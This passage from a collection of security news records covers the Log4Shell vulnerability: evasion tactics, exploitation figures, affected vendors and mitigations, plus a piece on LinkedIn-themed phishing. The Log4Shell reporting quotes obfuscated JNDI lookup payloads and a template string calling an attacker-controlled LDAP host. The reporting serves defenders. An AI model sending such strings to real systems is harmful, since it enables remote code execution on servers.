security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. \u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * ** **[**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201c\u201dWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * [VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": "https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:40", "description": "Emotionally vulnerable and willing to offer up any information that lands the gig, job seekers are prime targets for social engineering campaigns. And with the \u201cGreat Resignation\u201d in full swing, cybercriminals are having an easy time finding their next victim.\n\nJust since Feb. 1, analysts have watched [phishing email attacks impersonating LinkedIn](<https://www.egress.com/resources/cybersecurity-information/phishing/linkedin-phishing-attacks>) surge 232 percent, attempting to trick job seekers into giving up their credentials.\n\n\u201cCurrent employment trends help to make this attack more convincing,\u201d a new report from Egress said. \u201c\u2018The Great Resignation\u2019 continues to dominate headlines, and a record number of Americans left their jobs in 2021 for new opportunities. It is likely these phishing attacks aim to capitalize on jobseekers (plus curious individuals) by flattering them into believing their profile is being viewed and their experience is relevant to household brands.\u201d\n\nThe emails had subject lines that would be enticing to job hunters hoping to get noticed, like, \u201cWho\u2019s searching for you online,\u201d \u201cYou appeared in 4 searches this week\u201d or even \u201cYou have 1 new message,\u201d the Egress team said.\n\nThe [phishing emails](<https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/>) themselves were convincing dupes, built in HTML templates with the LinkedIn logo, colors and icons, the report added. The scammers also name-checked well-known companies throughout the bodies of the phishing emails, including American Express and CVS Carepoint, to make the correspondence seem more legitimate, the analysts said.\n\nEven the email\u2019s footer lifted the company\u2019s headquarters\u2019 address and included \u201cunsubscribe\u201d links to add to the email\u2019s authenticity, the analysts pointed out.\n\n\u201cYou can also see the LinkedIn display name spoofing, which is designed to hide the webmail accounts used to launch the attacks,\u201d the report said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/16154716/linkedin-phsihing-email.png>)\n\nLinkedIn phishing email. Source: Egress.\n\nOnce the victim clicks on the malicious links in the email, they were directed to a site to harvest their LinkedIn logins and passwords.\n\n\u201cWhile the display name is always LinkedIn and the emails all follow a similar pattern, the phishing attacks are sent from different webmail addresses that have zero correlation with each other,\u201d the analysts added. \u201cCurrently, it is unknown whether these attacks are the work of one cybercriminal or a gang operating together.\u201d\n\n021722 09:18 UPDATE: LinkedIn sent the following statement to Threatpost:\n\n\u201cOur internal teams work to take action against those who attempt to harm LinkedIn members through phishing. We encourage members to report suspicious messages and help them learn more about what they can do to protect themselves, including turning on [two-step verification](<https://www.linkedin.com/help/linkedin/answer/544/turn-two-step-verification-on-and-off?lang=en>). To learn more about how members can identify phishing messages, see our Help Center [here](<https://www.linkedin.com/help/linkedin/answer/5342/phishing-emails?lang=en>).\u201d\n\n## **Data Scraping Attacks on Job Seekers **\n\nBesides using potential job leads to trick targets into coughing up their credentials, Imperva, in a separate report, detailed how it stopped the [largest bot attack](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>) the company has seen to date, on a global job listing site.\n\nImperva didn\u2019t specifically name the company, but the company said that it was bombarded with 400 million bot requests over 400,000 unique IP addresses over four days that tried to scrape all its job seekers\u2019 data.\n\nThe Imperva team added that these types of web-scraping attacks are common and can result in \u201clower conversion rates, skewed marketing analytics, decrease in SEO ranking, website latency, and even downtime (usually caused by aggressive scrapers).\u201d\n\nBut as Imperva pointed out in its report, data scraping is one of those cybersecurity gray areas. Collecting publicly available information isn\u2019t itself a data breach, but collected in mass quantities, it can be a weapon wielded against users in social-engineering attacks.\n\nLast summer, a massive [data-scraping attack against LinkedIn](<https://threatpost.com/linkedin-data-scrape-victims-targeted-attackers/167473/>) was discovered to have collected at least 1.2 billion user records that were later sold on underground forums. At the time, LinkedIn reiterated that the [scraped data was public information](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>), not private information, and didn\u2019t qualify as a breach.\n\nLinkedIn isn\u2019t really at fault here, according to Yehuda Rosen, senior software engineer at nVisium.\n\n\u201cThis has little to do with LinkedIn specifically \u2013 they\u2019re not doing anything wrong here,\u201d Rosen explained to Threatpost. \u201cIt boils down to the fact that LinkedIn has hundreds of millions of members \u2013 many of whom are very accustomed to seeing frequent legitimate emails from LinkedIn \u2013 and may inevitably click without carefully checking that each and every email is the real deal.\u201d\n\nThat leaves it to individual users to be mindful of the information they expose publicly and how it could be used to trick them into clicking on a malicious link.\n\n\u201cWhile I don\u2019t believe that this will hurt LinkedIn\u2019s brand, this does reiterate the importance of email phishing education,\u201d Ray Kelly, with NTT Application Security, told Threatpost by email. \u201cGiven these emails are coming from a legit LinkedIn email address makes it especially difficult to identify the danger. My rule is to never click on email links. Always visit the site directly.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a _**[**_LIVE roundtable discussion_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. _**[**_REGISTER NOW_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T21:15:47", "type": "threatpost", "title": "Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T21:15:47", "id": "THREATPOST:CAA9AA939562959323A4675228C233A5", "href": "https://threatpost.com/massive-linkedin-phishing-bot-attacks-hungry-job-seekers/178476/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:11:40", "description": "An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover \u2014 and it\u2019s being exploited in the wild.\n\nThe flaw first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, on Thursday. The sites [reportedly](<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>) warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.\n\nThe same day, the as-yet-unpatched flaw was dubbed \u201cLog4Shell\u201d by [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) and began being tracked as [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>).\n\nBy early Friday morning, the Cyber Emergency Response Team (CERT) of the Deutsche Telekom Group [tweeted](<https://twitter.com/DTCERT/status/1469258597930614787>) that it was seeing attacks on its honeypots coming from the Tor network as threat actors tried to exploit the new bug,\n\n> \ud83d\udea8\u26a0\ufe0fNew #0-day vulnerability tracked under \"Log4Shell\" and CVE-2021-44228 discovered in Apache Log4j \ud83c\udf36\ufe0f\u203c\ufe0f We are observing attacks in our honeypot infrastructure coming from the TOR network. Find Mitigation instructions here: <https://t.co/tUKJSn8RPF> [pic.twitter.com/WkAn911rZX](<https://t.co/WkAn911rZX>)\n> \n> \u2014 Deutsche Telekom CERT (@DTCERT) [December 10, 2021](<https://twitter.com/DTCERT/status/1469258597930614787?ref_src=twsrc%5Etfw>)\n\nDitto for [CERT New Zealand](<https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/>); and all day, people have piped up on Twitter to warn that they\u2019re also seeing in-the-wild exploits.\n\nThis problem is going to cause a mini-internet meltdown, experts said, given that Log4j is incorporated into scads of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. That exposes an eye-watering number of third-party apps that may also be vulnerable to the same type of high-severity exploits as that spotted in Minecraft, as well as in cloud services such as Steam and Apple iCloud, LunaSec warned.\n\nAs of Friday, version 2.15.0 had been released: log4j-core.jar is available on Maven Central [here](<https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/>), with release notes are [available here](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0>) and Apache\u2019s Log4j security announcements [available here](<https://logging.apache.org/log4j/2.x/security.html>).\n\n## **\u2018Mini-Internet Meltdown\u2019 Imminent?**\n\nEven though an initial fix was rushed out on Friday, it\u2019s going to take time to trickle down to all of those projects, given how extensively the logging library is incorporated downstream.\n\n\u201cExpect a mini-internet meltdown soonish,\u201d said British security specialist Kevin Beaumont, who [tweeted](<https://twitter.com/GossiTheDog/status/1469255367049756676>) that the fix \u201cneeds to flow downstream to Apache Struts2, Solr, Linux distributions, vendors, appliances etc.\u201d\n\nJust one example of the bug\u2019s massive reach: On Friday morning, Rob Joyce, director of cybersecurity at the National Security Agency (NSA), [tweeted](<https://twitter.com/NSA_CSDirector/status/1469305071116636167>) that even the NSA\u2019s [GHIDRA](<https://ghidra-sre.org/>) \u2013 a suite of reverse-engineering tools developed by NSA\u2019s Research Directorate \u2013 includes the buggy Log4j library.\n\n> \u201cThe Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA\u2019s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.\u201d \u2014 _Rob Joyce, NSA Director of Cybersecurity._\n\n## Max CVSS Score of 10\n\nThe bug find has been credited to Chen Zhaojun of Alibaba. It\u2019s been assigned the [maximum CVSS score of 10](<https://logging.apache.org/log4j/2.x/security.html>), given how relatively easy it is to exploit, attackers\u2019 ability to seize control of targeted servers and the ubiquity of Log4j. According to CERT Austria, the security hole can be exploited by simply logging a special string.\n\nResearchers told Ars Technica that Log4Shell is a Java deserialization bug that stems from the library making network requests through the Java Naming and Directory Interface (JNDI) to an LDAP server and executing any code that\u2019s returned. It\u2019s reportedly triggered inside of log messages with use of the ${} syntax.\n\n\u201cJNDI triggers a look-up on a server controlled by the attacker and executes the returned code,\u201d according to CERT Austria\u2019s advisory, posted Friday, which noted that code for an exploit proof-of-concept (PoC) was [published on GitHub](<https://github.com/tangxiaofeng7/apache-log4j-poc>).\n\nThe internet\u2019s reaction: \u201cUmm, yikes.\u201d\n\n\u201cThis Log4j (CVE-2021-44228) vulnerability is extremely bad,\u201d [tweeted](<https://twitter.com/MalwareTechBlog/status/1469289471463944198>) security expert Marcus Hutchins. \u201cMillions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.\u201d\n\n## Javageddon\n\nSecurity researchers don\u2019t want to say that the sky is falling, per se, but. well, it is. They\u2019re comparing this scenario to Shellshock with regards to its huge potential severity. Aka [Bashdoor](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>), Shellshock was a family of security bugs in the Unix Bash [shell ](<https://en.wikipedia.org/wiki/Shell_\\(computing\\)> \"Shell \\(computing\\)\" )present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its initial disclosure in 2014, it was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning.\n\nSecurity researchers are considering Log4Shell to be much like Shellshock with regards to the enormous attack surface it poses. John Hammond, Senior Security Researcher at Huntress, who created [a PoC](<https://twitter.com/_JohnHammond/status/1469255402290401285>) for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data.\n\n_\u201c_Organizations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet,\u201d he told Threatpost via email on Friday. This isn\u2019t a targeted attack, he noted, given that \u201cthere is no target.\u201d\n\nHe recommended that organizations actively using Apache log4j \u201cabsolutely must upgrade to log4j-2.1.50-rc2 as soon as possible.\u201d\n\nHammond shared this [growing list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of software and components vulnerable to Log4Shell that\u2019s being cultivated on GitHub.\n\n``\n\n## Affected Versions\n\nOn Thursday, [LunaSec](<https://www.lunasec.io/docs/blog/log4j-zero-day/>) explained that affected versions are 2.0 &lt;= Apache log4j &lt;= 2.14.1.\n\nIt added that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren\u2019t affected by the LDAP attack vector, given that in those versions, \u201ccom.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load a remote codebase using LDAP.\u201d\n\nVulnerability also depends on specific configurations. But there are \u201cother attack vectors targeting this vulnerability which can result in RCE,\u201d LunaSec continued. \u201cDepending on what code is present on the server, an attacker could leverage this existing code to execute a payload,\u201d pointing to a [Veracode post](<https://www.veracode.com/blog/research/exploiting-jndi-injections-java>) on an attack targeting the class org.apache.naming.factory.BeanFactory that\u2019s present on Apache Tomcat servers.\n\nLunaSec concluded that, \u201cgiven how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.\u201d\n\nOrganizations can tell if they\u2019re affected by examining log files for services using affected Log4j versions. If they contain user-controlled strings \u2013 CERT-NZ uses the example of \u201cJndi:ldap\u201d \u2013 they could be affected.\n\n\u201cIf you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,\u201d cybersecurity researchers at Randori [wrote in a blog post](<https://www.randori.com/blog/cve-2021-44228/>).\n\nChris Morgan, senior cyber threat intelligence analyst at Digital Shadows, noted that a workaround released to address the flaw, which comes as part of Log4j version 2.15.0; reportedly changes a system setting from \u201cfalse\u201d to \u201ctrue\u201d by default.\n\nDon\u2019t change that, he warned: users who change the setting back to \u201cfalse\u201d remain vulnerable to attack, and as a result, \u201cit is highly recommended that this is not returned to its previous setting.,\u201d he told Threatpost on Friday. \u201cGiven the scale of affected devices and exploitability of the bug, it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors. Organizations are advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications.\u201d\n\n## Temporary Mitigation\n\nTo keep the library from being exploited, it\u2019s urgently recommended that Log4j versions are [upgraded](<https://logging.apache.org/log4j/2.x/security.html>) to log4j-2.15.0-rc1.\n\nBut for those who can\u2019t update straight off, LunaSec pointed to a [ discussion on HackerNews](<https://news.ycombinator.com/item?id=29507263>) regarding a mitigation strategy available in version 2.10.0 and higher of Log4j that was posted in the early hours of Friday morning.\n\nFor versions older than 2.10.0 that can\u2019t be upgraded, these mitigation choices have been suggested:\n\n * Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files ([here are Apache\u2019s details](<https://issues.apache.org/jira/browse/LOG4J2-2109>)); or,\n * Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application\u2019s or stack\u2019s classloading documentation to understand this behavior; or\n * Users should switch log4j2.formatMsgNoLookups to true by adding:\u201d\u2010Dlog4j2.formatMsgNoLookups=True\u201d to the JVM command for starting the application.\n\n## How the Vulnerability Works\n\nThe Huntress ThreatOps team has published [details](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>) on the vulnerability\u2019s impact and advice on what organizations should do next. Expect it and other reports to be updated as the situation unfolds.\n\nHuntress researchers said that the attack vector is \u201cextremely trivial\u201d for threat actors. As has been noted, it takes just a single text string to trigger an application to reach out to an external location if it\u2019s logged via the vulnerable instance of log4j.\n\nAs Hammond told Threatpost, a possible exploit could entail a threat actor supplying special text in an HTTP User-Agent header or a simple POST form request, with the usual form:\n\n${jndi:ldap://maliciousexternalhost.com/resource\n\n\u2026where maliciousexternalhost.com is an instance controlled by the adversary.\n\nThe log4j vulnerability parses the input and reaches out to the malicious host via the JNDI. \u201cThe first-stage resource acts as a springboard to another attacker-controlled endpoint, which serves Java code to be executed on the original victim,\u201d according to Huntress. \u201cUltimately, this grants the adversary the opportunity to run any code they would like on the target: remote code execution.\u201d\n\n## Stop, Drop, Hunt It Down\n\nSo much for baking Christmas cookies: It\u2019s going to be a long weekend for a lot of people, according to Casey Ellis, founder and CTO at Bugcrowd, who calls it \u201ca worst-case 